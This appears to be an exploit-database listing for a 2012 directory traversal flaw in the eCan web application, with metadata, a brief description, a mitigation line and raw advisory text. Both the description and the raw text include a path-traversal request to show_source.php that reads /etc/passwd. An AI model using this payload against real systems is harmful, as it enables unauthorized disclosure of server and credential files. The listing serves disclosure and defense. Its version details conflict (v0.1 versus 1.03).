header-logo
Suggest Exploit
vendor:
ecan
by:
GoLd_M
7,5
CVSS
HIGH
Local File Disclosure Vulnerability
200
CWE
Product Name: ecan
Affected Version From: 1.03
Affected Version To: 1.03
Patch Exists: NO
Related CWE: N/A
CPE: a:ecan:ecan:1.03
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2
2012

eCan v0.1 => Local File Disclosure Vulnerability

eCan v0.1 is vulnerable to a local file disclosure vulnerability. An attacker can exploit this vulnerability by sending a specially crafted request to the show_source.php script with a relative path to the file they wish to view. For example, a request to show_source.php?fid=../../../../../../../../../../../etc/passwd will display the contents of the /etc/passwd file.

Mitigation:

Ensure that the application is not vulnerable to directory traversal attacks by validating user input and sanitizing it before use.
Source

Exploit-DB raw data:

# Exploit Title: eCan v0.1 => Local File Disclosure Vulnerability
# Date: 11/07/2012
# Author: GoLd_M
# Vendor or Software Link: http://sourceforge.net/projects/ecan/
# Version: 1.03
# Category::  Local File Disclosure Vulnerability2
# Tested on: Xp SP 2
# Ex : 	[eCan v0.1]/show_source.php?fid=../../../../../../../../../../../etc/passwd
# See Test :  http://upload.traidnt.net/upfiles/hGq26645.jpg

Navigation

Suggest Exploit

Services By CQR